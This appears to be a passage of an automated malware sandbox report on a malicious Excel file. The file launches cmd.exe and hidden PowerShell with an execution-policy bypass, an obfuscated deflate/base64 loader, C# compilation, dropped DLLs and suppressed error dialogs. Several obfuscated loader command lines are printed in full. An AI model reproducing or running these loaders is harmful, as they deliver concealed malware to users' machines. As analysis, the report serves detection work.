Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Compiles C# or VB.Net codeShow sources
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeFile created: C:\Users\user\AppData\Local\Temp\h2oah0u7.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ua6j8io5.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeFile created: C:\Users\user\AppData\Local\Temp\3ndkwphw.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
